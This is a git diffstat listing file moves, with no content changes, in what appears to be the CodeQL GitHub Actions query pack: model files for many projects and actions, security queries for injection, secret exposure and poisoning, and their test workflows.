.../reusable-workflows/n8n-io_n8n.model.yml | 0 .../napari_napari.model.yml | 0 .../reusable-workflows/nasa_fprime.model.yml | 0 .../nautobot_nautobot.model.yml | 0 .../reusable-workflows/nektos_act.model.yml | 0 
.../neondatabase_neon.model.yml | 0 .../neovim_neovim.model.yml | 0 .../nethermindeth_nethermind.model.yml | 0 .../newrelic_newrelic-dotnet-agent.model.yml | 0 .../newrelic_newrelic-java-agent.model.yml | 0 .../newrelic_node-newrelic.model.yml | 0 .../nexus-mods_nexusmods.app.model.yml | 0 .../nginxinc_kubernetes-ingress.model.yml | 0 .../nocodb_nocodb.model.yml | 0 .../reusable-workflows/novuhq_novu.model.yml | 0 .../npm_abbrev-js.model.yml | 0 .../reusable-workflows/npm_cli.model.yml | 0 .../npm_fs-minipass.model.yml | 0 .../npm_hosted-git-info.model.yml | 0 .../reusable-workflows/npm_ini.model.yml | 0 ...pm_json-parse-even-better-errors.model.yml | 0 .../npm_minify-registry-metadata.model.yml | 0 .../npm_mute-stream.model.yml | 0 .../npm_node-semver.model.yml | 0 .../npm_node-which.model.yml | 0 .../reusable-workflows/npm_nopt.model.yml | 0 .../npm_normalize-package-data.model.yml | 0 .../npm_write-file-atomic.model.yml | 0 .../onflow_cadence.model.yml | 0 .../open-goal_jak-project.model.yml | 0 ...pen-telemetry_opentelemetry-demo.model.yml | 0 ...try_opentelemetry-dotnet-contrib.model.yml | 0 ...n-telemetry_opentelemetry-dotnet.model.yml | 0 ...entelemetry-java-instrumentation.model.yml | 0 ...lemetry_opentelemetry-js-contrib.model.yml | 0 ...telemetry_opentelemetry-operator.model.yml | 0 .../openbao_openbao.model.yml | 0 .../openhab_openhab-docs.model.yml | 0 .../openmined_pysyft.model.yml | 0 .../opentofu_opentofu.model.yml | 0 .../openttd_openttd.model.yml | 0 .../openvinotoolkit_openvino.model.yml | 0 .../reusable-workflows/openxla_iree.model.yml | 0 .../reusable-workflows/openzfs_zfs.model.yml | 0 ...ator-framework_java-operator-sdk.model.yml | 0 .../orange-opensource_hurl.model.yml | 0 ...aolosalvatori_servicebusexplorer.model.yml | 0 .../parcel-bundler_parcel.model.yml | 0 .../pardeike_harmony.model.yml | 0 .../reusable-workflows/pcsx2_pcsx2.model.yml | 0 .../pennylaneai_pennylane.model.yml | 0 ...necone-io_pinecone-python-client.model.yml | 0 
.../pixie-io_pixie.model.yml | 0 .../plantuml_plantuml.model.yml | 0 .../powerdns_pdns.model.yml | 0 .../preactjs_preact.model.yml | 0 .../prismlauncher_prismlauncher.model.yml | 0 .../product-os_flowzone.model.yml | 0 .../project-oak_oak.model.yml | 0 .../reusable-workflows/prql_prql.model.yml | 0 .../pulumi_pulumi.model.yml | 0 .../puppeteer_puppeteer.model.yml | 0 .../puppetlabs_puppetlabs-puppetdb.model.yml | 0 .../reusable-workflows/pyo3_maturin.model.yml | 0 .../reusable-workflows/pyo3_pyo3.model.yml | 0 .../python_cpython.model.yml | 0 .../pytorch_botorch.model.yml | 0 .../reusable-workflows/pytorch_xla.model.yml | 0 .../quarto-dev_quarto-cli.model.yml | 0 .../rancher_dashboard.model.yml | 0 .../rasterio_rasterio.model.yml | 0 .../redisearch_redisearch.model.yml | 0 .../remix-run_remix.model.yml | 0 .../rmcrackan_libation.model.yml | 0 .../rocketchat_rocket.chat.model.yml | 0 .../ruby_ruby.wasm.model.yml | 0 .../rustdesk_rustdesk.model.yml | 0 .../saadeghi_daisyui.model.yml | 0 .../sagemath_sage.model.yml | 0 .../schemastore_schemastore.model.yml | 0 .../scikit-learn_scikit-learn.model.yml | 0 .../seleniumhq_selenium.model.yml | 0 .../shaka-project_shaka-packager.model.yml | 0 .../shaka-project_shaka-player.model.yml | 0 .../shimataro_ssh-key-action.model.yml | 0 .../softfever_orcaslicer.model.yml | 0 ...-mansion_react-native-reanimated.model.yml | 0 .../solana-labs_solana.model.yml | 0 .../sonarr_sonarr.model.yml | 0 .../speedb-io_speedb.model.yml | 0 ...ring-cloud_spring-cloud-dataflow.model.yml | 0 .../sqlfluff_sqlfluff.model.yml | 0 .../stdlib-js_stdlib.model.yml | 0 .../stereokit_stereokit.model.yml | 0 .../streetsidesoftware_cspell.model.yml | 0 .../supabase_auth.model.yml | 0 .../reusable-workflows/supabase_cli.model.yml | 0 .../tencent_hippy.model.yml | 0 .../tgstation_tgstation.model.yml | 0 .../thesofproject_sof.model.yml | 0 .../tiann_kernelsu.model.yml | 0 .../tiledb-inc_tiledb.model.yml | 0 .../toeverything_affine.model.yml | 0 
.../tracel-ai_burn.model.yml | 0 .../tribler_tribler.model.yml | 0 .../ubisoft_sharpmake.model.yml | 0 .../unity-technologies_ml-agents.model.yml | 0 .../reusable-workflows/urbit_urbit.model.yml | 0 .../uyuni-project_uyuni.model.yml | 0 .../vert-x3_vertx-hazelcast.model.yml | 0 .../reusable-workflows/vkcom_vkui.model.yml | 0 .../walletconnect_web3modal.model.yml | 0 .../warzone2100_warzone2100.model.yml | 0 .../wasmedge_wasmedge.model.yml | 0 .../web-infra-dev_rspack.model.yml | 0 .../reusable-workflows/werf_werf.model.yml | 0 .../widdix_aws-cf-templates.model.yml | 0 .../wildfly_wildfly.model.yml | 0 .../yt-dlp_yt-dlp.model.yml | 0 .../zenml-io_zenml.model.yml | 0 .../zephyrproject-rtos_zephyr.model.yml | 0 .../zitadel_zitadel.model.yml | 0 .../ext/manual/8398a7_action-slack.model.yml | 0 .../manual/AsasInnab_regex-action.model.yml | 0 .../ext/manual/MeilCli_regex-match.model.yml | 0 ...rSource_sonarcloud-github-action.model.yml | 0 .../Steph0_dotenv-configserver.model.yml | 0 ...us_github-action-files-in-commit.model.yml | 0 .../manual/aarcangeli_load-dotenv.model.yml | 0 .../ab185508_file-type-finder.model.yml | 0 ...ons-ecosystem_action-regex-match.model.yml | 0 .../manual/actions_github-script.model.yml | 0 ...ahmadnassri_action-changed-files.model.yml | 0 .../manual/akefirad_loadenv-action.model.yml | 0 .../manual/akhileshns_heroku-deploy.model.yml | 0 ...bell_pull-request-comment-branch.model.yml | 0 ...nnn_action-semantic-pull-request.model.yml | 0 .../ext/manual/anchore_sbom-action.model.yml | 0 .../ext/manual/anchore_scan-action.model.yml | 0 .../andresz1_size-limit-action.model.yml | 0 .../android-actions_setup-android.model.yml | 0 .../ankitjain28may_list-files-in-pr.model.yml | 0 ...le-actions_import-codesign-certs.model.yml | 0 .../ext/manual/appleboy_ssh-action.model.yml | 0 .../lib/ext/manual/asdf-vm_actions.model.yml | 0 ...taylor_read-json-property-action.model.yml | 0 ...ley-taylor_regex-property-action.model.yml | 0 
.../aszc_change-string-case-action.model.yml | 0 ...aamMavridis_files-changed-action.model.yml | 0 ...ctions_configure-aws-credentials.model.yml | 0 .../axel-op_googlejavaformat-action.model.yml | 0 .../ql}/lib/ext/manual/azure_cli.model.yml | 0 .../lib/ext/manual/azure_powershell.model.yml | 0 .../ext/manual/bahmutov_npm-install.model.yml | 0 .../blackducksoftware_github-action.model.yml | 0 .../manual/bobheadxi_deployments.model.yml | 0 .../bufbuild_buf-breaking-action.model.yml | 0 .../manual/bufbuild_buf-lint-action.model.yml | 0 .../bufbuild_buf-setup-action.model.yml | 0 .../c-py_action-dotenv-to-setenv.model.yml | 0 .../ext/manual/cachix_cachix-action.model.yml | 0 .../ext/manual/changesets_action.model.yml | 0 .../cloudflare_wrangler-action.model.yml | 0 .../cosq-network_dotenv-loader.model.yml | 0 .../manual/coursier_cache-action.model.yml | 0 .../crazy-max_ghaction-chocolatey.model.yml | 0 .../crazy-max_ghaction-import-gpg.model.yml | 0 .../csexton_release-asset-action.model.yml | 0 ...cycjimmy_semantic-release-action.model.yml | 0 .../manual/cypress-io_github-action.model.yml | 0 .../dailydotdev_action-devcard.model.yml | 0 ...me_reportgenerator-github-action.model.yml | 0 .../daspn_private-actions-checkout.model.yml | 0 .../dawidd6_action-ansible-playbook.model.yml | 0 ...dawidd6_action-download-artifact.model.yml | 0 .../manual/delaguardo_setup-clojure.model.yml | 0 ...tesystems_magic-nix-cache-action.model.yml | 0 .../devorbitus_yq-action-output.model.yml | 0 ...er-practice_actions-setup-docker.model.yml | 0 .../manual/docker_build-push-action.model.yml | 0 ...3d_action-extract-unique-matches.model.yml | 0 .../manual/eficode_resolve-pr-refs.model.yml | 0 .../ext/manual/endbug_latest-tag.model.yml | 0 .../manual/expo_expo-github-action.model.yml | 0 ...seextended_action-hosting-deploy.model.yml | 0 .../frabert_replace-string-action.model.yml | 0 ...nzdiebold_github-env-vars-action.model.yml | 0 .../manual/gabrielbb_xvfb-action.model.yml | 0 
.../manual/game-ci_unity-builder.model.yml | 0 .../game-ci_unity-test-runner.model.yml | 0 ...autamkrishnar_blog-post-workflow.model.yml | 0 .../manual/getsentry_action-release.model.yml | 0 .../ext/manual/github_codeql-action.model.yml | 0 .../go-semantic-release_action.model.yml | 0 .../golangci_golangci-lint-action.model.yml | 0 .../gonuit_heroku-docker-deploy.model.yml | 0 .../goreleaser_goreleaser-action.model.yml | 0 ...tson_pull-request-comment-branch.model.yml | 0 ...te-or-update-pull-request-action.model.yml | 0 .../gradle_gradle-build-action.model.yml | 0 .../manual/haya14busa_action-cond.model.yml | 0 .../manual/hexlet_project-action.model.yml | 0 .../ext/manual/ilammy_msvc-dev-cmd.model.yml | 0 .../ext/manual/ilammy_setup-nasm.model.yml | 0 .../ext/manual/imjohnbo_issue-bot.model.yml | 0 .../ext/manual/iterative_setup-cml.model.yml | 0 .../ext/manual/iterative_setup-dvc.model.yml | 0 ...sives_github-pages-deploy-action.model.yml | 0 .../jitterbit_get-changed-files.model.yml | 0 .../johnnymorganz_stylua-action.model.yml | 0 .../manual/jsdaniell_create-json.model.yml | 0 .../jsmith_changes-since-last-tag.model.yml | 0 .../jurplel_install-qt-action.model.yml | 0 .../ext/manual/jwalton_gh-ecr-push.model.yml | 0 .../kaisugi_action-regex-match.model.yml | 0 ...rpikpl_list-changed-files-action.model.yml | 0 ...han_pull-request-comment-trigger.model.yml | 0 .../ext/manual/knu_changed-files.model.yml | 0 ...leci-artifacts-redirector-action.model.yml | 0 .../ext/manual/leafo_gh-actions-lua.model.yml | 0 .../leafo_gh-actions-luarocks.model.yml | 0 ...logs_gh-action-get-changed-files.model.yml | 0 .../lucasbento_auto-close-issues.model.yml | 0 ...felipelaviola_parse-plain-dotenv.model.yml | 0 ..._actions-find-and-replace-string.model.yml | 0 .../ext/manual/magefile_mage-action.model.yml | 0 .../manual/maierj_fastlane-action.model.yml | 0 .../manusa_actions-setup-minikube.model.yml | 0 .../manual/marocchino_on_artifact.model.yml | 0 
.../martinhaintz_ga-file-list.model.yml | 0 .../manual/mattdavis0351_actions.model.yml | 0 .../meteorengineer_setup-meteor.model.yml | 0 ...tro-digital_setup-tools-for-waas.model.yml | 0 .../manual/microsoft_setup-msbuild.model.yml | 0 .../ql}/lib/ext/manual/mikefarah_yq.model.yml | 0 ...mishakav_pytest-coverage-comment.model.yml | 0 ...hers-excellent_docker-build-push.model.yml | 0 .../ext/manual/msys2_setup-msys2.model.yml | 0 .../manual/mxschmitt_action-tmate.model.yml | 0 .../manual/mymindstorm_setup-emsdk.model.yml | 0 .../nanasess_setup-chromedriver.model.yml | 0 .../ext/manual/nanasess_setup-php.model.yml | 0 .../ext/manual/nick-fields_retry.model.yml | 0 .../manual/octokit_graphql-action.model.yml | 0 .../manual/octokit_request-action.model.yml | 0 .../ext/manual/olafurpg_setup-scala.model.yml | 0 .../paambaati_codeclimate-action.model.yml | 0 ...ulschuberth_regex-extract-action.model.yml | 0 .../peter-evans_create-pull-request.model.yml | 0 ...-murray_issue-body-parser-action.model.yml | 0 ...r-murray_issue-forms-body-parser.model.yml | 0 .../plasmicapp_plasmic-action.model.yml | 0 .../potiuk_get-workflow-origin.model.yml | 0 .../preactjs_compressed-size-action.model.yml | 0 .../ext/manual/py-actions_flake8.model.yml | 0 ...py-actions_py-dependency-install.model.yml | 0 .../ext/manual/pyo3_maturin-action.model.yml | 0 ...vecircus_android-emulator-runner.model.yml | 0 .../ext/manual/read-file-actions.model.yml | 0 ...bers-in-action_download-artifact.model.yml | 0 .../ext/manual/reggionick_s3-deploy.model.yml | 0 .../ext/manual/release-kit_regex.model.yml | 0 .../renovatebot_github-action.model.yml | 0 .../rishabh510_path-lister-action.model.yml | 0 .../roots_issue-closer-action.model.yml | 0 .../manual/ros-tooling_setup-ros.model.yml | 0 .../lib/ext/manual/ruby_setup-ruby.model.yml | 0 ...ction-detect-and-tag-new-version.model.yml | 0 .../ext/manual/sergeysova_jq-action.model.yml | 0 ...shallwefootball_upload-s3-action.model.yml | 0 
.../shogo82148_actions-setup-perl.model.yml | 0 ...skitionek_notify-microsoft-teams.model.yml | 0 .../ext/manual/snow-actions_eclint.model.yml | 0 .../stackhawk_hawkscan-action.model.yml | 0 .../step-security_harden-runner.model.yml | 0 .../suisei-cn_actions-download-file.model.yml | 0 .../the-coding-turtle_ga-file-list.model.yml | 0 .../lib/ext/manual/tibdex_backport.model.yml | 0 .../tim-actions_get-pr-commits.model.yml | 0 .../manual/timheuer_base64-to-file.model.yml | 0 .../manual/tj-actions_branch-names.model.yml | 0 ...tmelliottjr_extract-regex-action.model.yml | 0 .../trilom_file-changes-action.model.yml | 0 ...ss_conventional-changelog-action.model.yml | 0 .../tryghost_action-deploy-theme.model.yml | 0 .../manual/tzkhan_pr-update-action.model.yml | 0 .../manual/veracode_veracode-sca.model.yml | 0 .../w3f_action-find-old-files.model.yml | 0 .../wearerequired_lint-action.model.yml | 0 .../ext/manual/webfactory_ssh-agent.model.yml | 0 .../lib/ext/manual/xom9ikk_dotenv.model.yml | 0 ...rted_pull-request-comment-branch.model.yml | 0 .../manual/yumemi-inc_changed-files.model.yml | 0 .../manual/zaproxy_action-baseline.model.yml | 0 .../manual/zaproxy_action-full-scan.model.yml | 0 ...zentered_issue-forms-body-parser.model.yml | 0 .../lib/ide-contextual-queries/printAst.ql | 0 .../lib/ide-contextual-queries/printCfg.ql | 0 {ql => actions/ql}/lib/qlpack.yml | 0 {ql => actions/ql}/src/Debug/SyntaxError.ql | 0 {ql => actions/ql}/src/Debug/partial.ql | 0 .../ql}/src/Models/CompositeActionsSinks.ql | 0 .../ql}/src/Models/CompositeActionsSources.ql | 0 .../src/Models/CompositeActionsSummaries.ql | 0 .../ql}/src/Models/ReusableWorkflowsSinks.ql | 0 .../src/Models/ReusableWorkflowsSources.ql | 0 .../src/Models/ReusableWorkflowsSummaries.ql | 0 .../Security/CWE-074/OutputClobberingHigh.ql | 0 .../CWE-077/EnvPathInjectionCritical.md | 0 .../CWE-077/EnvPathInjectionCritical.ql | 0 .../CWE-077/EnvPathInjectionMedium.md | 0 .../CWE-077/EnvPathInjectionMedium.ql | 0 
.../CWE-077/EnvVarInjectionCritical.md | 0 .../CWE-077/EnvVarInjectionCritical.ql | 0 .../Security/CWE-077/EnvVarInjectionMedium.md | 0 .../Security/CWE-077/EnvVarInjectionMedium.ql | 0 .../CWE-078/CommandInjectionCritical.ql | 0 .../CWE-078/CommandInjectionMedium.ql | 0 .../CWE-088/ArgumentInjectionCritical.md | 0 .../CWE-088/ArgumentInjectionCritical.ql | 0 .../CWE-088/ArgumentInjectionMedium.md | 0 .../CWE-088/ArgumentInjectionMedium.ql | 0 .../Security/CWE-094/CodeInjectionCritical.md | 0 .../Security/CWE-094/CodeInjectionCritical.ql | 0 .../Security/CWE-094/CodeInjectionMedium.md | 0 .../Security/CWE-094/CodeInjectionMedium.ql | 0 .../CWE-1395/UseOfKnownVulnerableAction.md | 0 .../CWE-1395/UseOfKnownVulnerableAction.ql | 0 .../Security/CWE-200/SecretExfiltration.ql | 0 .../CWE-275/MissingActionsPermissions.md | 0 .../CWE-275/MissingActionsPermissions.ql | 0 .../CodeExecutionOnSelfHostedRunner.ql | 0 .../Security/CWE-285/ImproperAccessControl.md | 0 .../Security/CWE-285/ImproperAccessControl.ql | 0 .../CWE-312/ExcessiveSecretsExposure.md | 0 .../CWE-312/ExcessiveSecretsExposure.ql | 0 .../Security/CWE-312/SecretsInArtifacts.md | 0 .../Security/CWE-312/SecretsInArtifacts.ql | 0 .../CWE-312/UnmaskedSecretExposure.md | 0 .../CWE-312/UnmaskedSecretExposure.ql | 0 .../CWE-349/CachePoisoningViaCodeInjection.md | 0 .../CWE-349/CachePoisoningViaCodeInjection.ql | 0 .../CWE-349/CachePoisoningViaDirectCache.md | 0 .../CWE-349/CachePoisoningViaDirectCache.ql | 0 .../CachePoisoningViaPoisonableStep.md | 0 .../CachePoisoningViaPoisonableStep.ql | 0 .../UntrustedCheckoutTOCTOUCritical.md | 0 .../UntrustedCheckoutTOCTOUCritical.ql | 0 .../CWE-367/UntrustedCheckoutTOCTOUHigh.md | 0 .../CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 0 .../CWE-571/ExpressionIsAlwaysTrueCritical.md | 0 .../CWE-571/ExpressionIsAlwaysTrueCritical.ql | 0 .../CWE-571/ExpressionIsAlwaysTrueHigh.md | 0 .../CWE-571/ExpressionIsAlwaysTrueHigh.ql | 0 .../CWE-829/ArtifactPoisoningCritical.md | 0 
.../CWE-829/ArtifactPoisoningCritical.ql | 0 .../CWE-829/ArtifactPoisoningMedium.md | 0 .../CWE-829/ArtifactPoisoningMedium.ql | 0 .../CWE-829/ArtifactPoisoningPathTraversal.ql | 0 .../Security/CWE-829/UnpinnedActionsTag.md | 0 .../Security/CWE-829/UnpinnedActionsTag.ql | 0 .../CWE-829/UntrustedCheckoutCritical.md | 0 .../CWE-829/UntrustedCheckoutCritical.ql | 0 .../Security/CWE-829/UntrustedCheckoutHigh.md | 0 .../Security/CWE-829/UntrustedCheckoutHigh.ql | 0 .../CWE-829/UntrustedCheckoutMedium.md | 0 .../CWE-829/UntrustedCheckoutMedium.ql | 0 .../CWE-829/UnversionedImmutableAction.md | 0 .../CWE-829/UnversionedImmutableAction.ql | 0 .../src/Security/CWE-918/RequestForgery.ql | 0 .../CodeQL/UnnecessaryUseOfAdvancedConfig.md | 0 .../CodeQL/UnnecessaryUseOfAdvancedConfig.ql | 0 {ql => actions/ql}/src/codeql-pack.lock.yml | 0 .../ql}/src/codeql-suites/actions-all.qls | 0 .../src/codeql-suites/actions-bughalla.qls | 0 .../codeql-suites/actions-code-scanning.qls | 0 .../actions-security-and-quality.qls | 0 .../actions-summaries-queries.qls | 0 {ql => actions/ql}/src/qlpack.yml | 0 {ql => actions/ql}/test/codeql-pack.lock.yml | 0 .../.github/workflows/commands.yml | 0 .../.github/workflows/expression_nodes.yml | 0 .../.github/workflows/multiline.yml | 0 .../.github/workflows/multiline2.yml | 0 .../.github/workflows/poisonable_steps.yml | 0 .../library-tests/.github/workflows/shell.yml | 0 .../library-tests/.github/workflows/test.yml | 0 .../ql}/test/library-tests/commands.expected | 0 .../ql}/test/library-tests/commands.ql | 0 .../library-tests/poisonable_steps.expected | 0 .../test/library-tests/poisonable_steps.ql | 0 .../ql}/test/library-tests/test.expected | 0 {ql => actions/ql}/test/library-tests/test.ql | 0 .../test/library-tests/workflowenum.expected | 0 .../ql}/test/library-tests/workflowenum.ql | 0 {ql => actions/ql}/test/qlpack.yml | 0 .../.github/workflows/calling_composite.yml | 0 .../.github/workflows/calling_workflow.yml | 0 
.../.github/workflows/reusable_workflow.yml | 0 .../Models/CompositeActionsSinks.expected | 0 .../Models/CompositeActionsSinks.qlref | 0 .../Models/CompositeActionsSources.expected | 0 .../Models/CompositeActionsSources.qlref | 0 .../Models/CompositeActionsSummaries.expected | 0 .../Models/CompositeActionsSummaries.qlref | 0 .../Models/ReusableWorkflowsSinks.expected | 0 .../Models/ReusableWorkflowsSinks.qlref | 0 .../Models/ReusableWorkflowsSources.expected | 0 .../Models/ReusableWorkflowsSources.qlref | 0 .../ReusableWorkflowsSummaries.expected | 0 .../Models/ReusableWorkflowsSummaries.qlref | 0 .../query-tests/Models/action1/action.yml | 0 .../CWE-074/.github/workflows/output1.yml | 0 .../CWE-074/.github/workflows/output2.yml | 0 .../CWE-074/OutputClobberingHigh.expected | 0 .../CWE-074/OutputClobberingHigh.qlref | 0 .../actions/download-artifact-2/action.yaml | 0 .../actions/download-artifact/action.yaml | 0 .../.github/workflows/artifactpoisoning51.yml | 0 .../.github/workflows/artifactpoisoning52.yml | 0 .../.github/workflows/artifactpoisoning53.yml | 0 .../.github/workflows/artifactpoisoning91.yml | 0 .../.github/workflows/artifactpoisoning92.yml | 0 .../CWE-077/.github/workflows/path1.yml | 0 .../CWE-077/.github/workflows/test1.yml | 0 .../CWE-077/.github/workflows/test10.yml | 0 .../CWE-077/.github/workflows/test11.yml | 0 .../CWE-077/.github/workflows/test12.yml | 0 .../CWE-077/.github/workflows/test13.yml | 0 .../CWE-077/.github/workflows/test14.yml | 0 .../CWE-077/.github/workflows/test15.yml | 0 .../CWE-077/.github/workflows/test16.yml | 0 .../CWE-077/.github/workflows/test17.yml | 0 .../CWE-077/.github/workflows/test18.yml | 0 .../CWE-077/.github/workflows/test19.yml | 0 .../CWE-077/.github/workflows/test2.yml | 0 .../CWE-077/.github/workflows/test3.yml | 0 .../CWE-077/.github/workflows/test4.yml | 0 .../CWE-077/.github/workflows/test5.yml | 0 .../CWE-077/.github/workflows/test6.yml | 0 .../CWE-077/.github/workflows/test7.yml | 0 
.../CWE-077/.github/workflows/test8.yml | 0 .../CWE-077/.github/workflows/test9.yml | 0 .../CWE-077/EnvPathInjectionCritical.expected | 0 .../CWE-077/EnvPathInjectionCritical.qlref | 0 .../CWE-077/EnvPathInjectionMedium.expected | 0 .../CWE-077/EnvPathInjectionMedium.qlref | 0 .../CWE-077/EnvVarInjectionCritical.expected | 0 .../CWE-077/EnvVarInjectionCritical.qlref | 0 .../CWE-077/EnvVarInjectionMedium.expected | 0 .../CWE-077/EnvVarInjectionMedium.qlref | 0 .../actions/run-airbyte-ci/action.yaml | 0 .../.github/workflows/comment_issue.yml | 0 .../.github/workflows/documentation.yml | 0 .../CWE-078/.github/workflows/test1.yml | 0 .../CWE-078/CommandInjectionCritical.expected | 0 .../CWE-078/CommandInjectionCritical.qlref | 0 .../CWE-078/CommandInjectionMedium.expected | 0 .../CWE-078/CommandInjectionMedium.qlref | 0 .../.github/workflows/arg_injection.yml | 0 .../ArgumentInjectionCritical.expected | 0 .../CWE-088/ArgumentInjectionCritical.qlref | 0 .../CWE-088/ArgumentInjectionMedium.expected | 0 .../CWE-088/ArgumentInjectionMedium.qlref | 0 .../.github/actions/action1/action.yml | 0 .../.github/actions/action2/action.yml | 0 .../.github/actions/action3/action.yml | 0 .../.github/actions/action4/action.yml | 0 .../.github/actions/action5/action.yml | 0 .../.github/actions/action6/action.yml | 0 .../.github/actions/action7/action.yml | 0 .../.github/actions/clone-repo/action.yaml | 0 .../external/ultralytics/actions/action.yaml | 0 .../.github/workflows/argus_case_study.yml | 0 .../.github/workflows/artifactpoisoning1.yml | 0 .../.github/workflows/artifactpoisoning2.yml | 0 .../.github/workflows/artifactpoisoning3.yml | 0 .../.github/workflows/artifactpoisoning4.yml | 0 .../.github/workflows/artifactpoisoning5.yml | 0 .../.github/workflows/artifactpoisoning6.yml | 0 .../.github/workflows/artifactpoisoning7.yml | 0 .../.github/workflows/artifactpoisoning8.yml | 0 .../.github/workflows/changed-files.yml | 0 .../.github/workflows/comment_issue.yml | 0 
.../workflows/comment_issue_newline.yml | 0 .../workflows/composite-action-caller-1.yml | 0 .../workflows/composite-action-caller-2.yml | 0 .../workflows/composite-action-caller-3.yml | 0 .../workflows/composite-action-caller-4.yml | 0 .../CWE-094/.github/workflows/cross1.yml | 0 .../CWE-094/.github/workflows/cross2.yml | 0 .../CWE-094/.github/workflows/cross3.yml | 0 .../CWE-094/.github/workflows/discussion.yml | 0 .../.github/workflows/discussion_comment.yml | 0 .../.github/workflows/publishResults.yml | 0 .../.github/workflows/reusable-workflow.yml | 0 .../CWE-094/.github/workflows/gollum.yml | 0 .../workflows/image_link_generator.yml | 0 .../CWE-094/.github/workflows/inter-job0.yml | 0 .../CWE-094/.github/workflows/inter-job1.yml | 0 .../CWE-094/.github/workflows/inter-job2.yml | 0 .../CWE-094/.github/workflows/inter-job4.yml | 0 .../CWE-094/.github/workflows/inter-job5.yml | 0 .../CWE-094/.github/workflows/issues.yaml | 0 .../CWE-094/.github/workflows/json_wrap.yml | 0 .../CWE-094/.github/workflows/level0.yml | 0 .../CWE-094/.github/workflows/level1.yml | 0 .../CWE-094/.github/workflows/matrix.yml | 0 .../CWE-094/.github/workflows/matrix_flow.yml | 0 .../CWE-094/.github/workflows/no-flow1.yml | 0 .../CWE-094/.github/workflows/no-flow2.yml | 0 .../.github/workflows/output_clobbering1.yml | 0 .../.github/workflows/output_clobbering2.yml | 0 .../.github/workflows/priv_pull_request.yml | 0 .../.github/workflows/pull_request_review.yml | 0 .../workflows/pull_request_review_comment.yml | 0 .../.github/workflows/pull_request_target.yml | 0 .../CWE-094/.github/workflows/push.yml | 0 .../.github/workflows/reusable-workflow-1.yml | 0 .../.github/workflows/reusable-workflow-2.yml | 0 .../workflows/reusable-workflow-caller-1.yml | 0 .../workflows/reusable-workflow-caller-2.yml | 0 .../workflows/reusable-workflow-caller-3.yml | 0 .../CWE-094/.github/workflows/self_needs.yml | 0 .../CWE-094/.github/workflows/simple1.yml | 0 .../CWE-094/.github/workflows/simple2.yml | 0 
.../CWE-094/.github/workflows/simple3.yml | 0 .../.github/workflows/slash_command1.yml | 0 .../.github/workflows/slash_command2.yml | 0 .../.github/workflows/sonar-source.yml | 0 .../CWE-094/.github/workflows/test.yml | 0 .../CWE-094/.github/workflows/test1.yml | 0 .../CWE-094/.github/workflows/test10.yml | 0 .../CWE-094/.github/workflows/test11.yml | 0 .../CWE-094/.github/workflows/test12.yml | 0 .../CWE-094/.github/workflows/test13.yml | 0 .../CWE-094/.github/workflows/test14.yml | 0 .../CWE-094/.github/workflows/test15.yml | 0 .../CWE-094/.github/workflows/test16.yml | 0 .../CWE-094/.github/workflows/test17.yml | 0 .../CWE-094/.github/workflows/test18.yml | 0 .../CWE-094/.github/workflows/test19.yml | 0 .../CWE-094/.github/workflows/test2.yml | 0 .../CWE-094/.github/workflows/test20.yml | 0 .../CWE-094/.github/workflows/test21.yml | 0 .../CWE-094/.github/workflows/test22.yml | 0 .../CWE-094/.github/workflows/test23.yml | 0 .../CWE-094/.github/workflows/test24.yml | 0 .../CWE-094/.github/workflows/test25.yml | 0 .../CWE-094/.github/workflows/test26.yml | 0 .../CWE-094/.github/workflows/test27.yml | 0 .../CWE-094/.github/workflows/test28.yml | 0 .../CWE-094/.github/workflows/test29.yml | 0 .../CWE-094/.github/workflows/test3.yml | 0 .../CWE-094/.github/workflows/test4.yml | 0 .../CWE-094/.github/workflows/test5.yml | 0 .../CWE-094/.github/workflows/test6.yml | 0 .../CWE-094/.github/workflows/test7.yml | 0 .../CWE-094/.github/workflows/test8.yml | 0 .../CWE-094/.github/workflows/test9.yml | 0 .../.github/workflows/untrusted_checkout1.yml | 0 .../.github/workflows/workflow_run.yml | 0 .../workflows/workflow_run_branches1.yml | 0 .../workflows/workflow_run_branches2.yml | 0 .../workflows/workflow_run_branches3.yml | 0 .../workflows/workflow_run_branches4.yml | 0 .../workflows/workflow_run_branches5.yml | 0 .../CWE-094/CodeInjectionCritical.expected | 0 .../CWE-094/CodeInjectionCritical.qlref | 0 .../CWE-094/CodeInjectionMedium.expected | 0 
.../CWE-094/CodeInjectionMedium.qlref | 0 .../CWE-1395/.github/workflows/test1.yml | 0 .../UseOfKnownVulnerableAction.expected | 0 .../CWE-1395/UseOfKnownVulnerableAction.qlref | 0 .../CWE-200/.github/workflows/test1.yml | 0 .../CWE-200/SecretExfiltration.expected | 0 .../Security/CWE-200/SecretExfiltration.qlref | 0 .../CWE-275/.github/workflows/perms1.yml | 0 .../CWE-275/.github/workflows/perms2.yml | 0 .../CWE-275/.github/workflows/perms3.yml | 0 .../CWE-275/.github/workflows/perms4.yml | 0 .../CWE-275/.github/workflows/perms5.yml | 0 .../MissingActionsPermissions.expected | 0 .../CWE-275/MissingActionsPermissions.qlref | 0 .../CWE-284/.github/workflows/test1.yml | 0 .../CWE-284/.github/workflows/test2.yml | 0 .../CodeExecutionOnSelfHostedRunner.expected | 0 .../CodeExecutionOnSelfHostedRunner.qlref | 0 .../CWE-285/.github/workflows/test1.yml | 0 .../CWE-285/.github/workflows/test2.yml | 0 .../CWE-285/ImproperAccessControl.expected | 0 .../CWE-285/ImproperAccessControl.qlref | 0 .../CWE-312/.github/workflows/neg_test1.yml | 0 .../workflows/secrets-in-artifacts.yml | 0 .../CWE-312/.github/workflows/test1.yml | 0 .../CWE-312/ExcessiveSecretsExposure.expected | 0 .../CWE-312/ExcessiveSecretsExposure.qlref | 0 .../CWE-312/SecretsInArtifacts.expected | 0 .../Security/CWE-312/SecretsInArtifacts.qlref | 0 .../CWE-312/UnmaskedSecretExposure.expected | 0 .../CWE-312/UnmaskedSecretExposure.qlref | 0 .../.github/workflows/code_injection1.yml | 0 .../.github/workflows/code_injection2.yml | 0 .../.github/workflows/direct_cache1.yml | 0 .../.github/workflows/direct_cache2.yml | 0 .../.github/workflows/direct_cache3.yml | 0 .../.github/workflows/direct_cache4.yml | 0 .../.github/workflows/direct_cache5.yml | 0 .../.github/workflows/direct_cache6.yml | 0 .../.github/workflows/neg_code_injection1.yml | 0 .../.github/workflows/neg_direct_cache1.yml | 0 .../.github/workflows/neg_direct_cache2.yml | 0 .../.github/workflows/neg_direct_cache3.yml | 0 
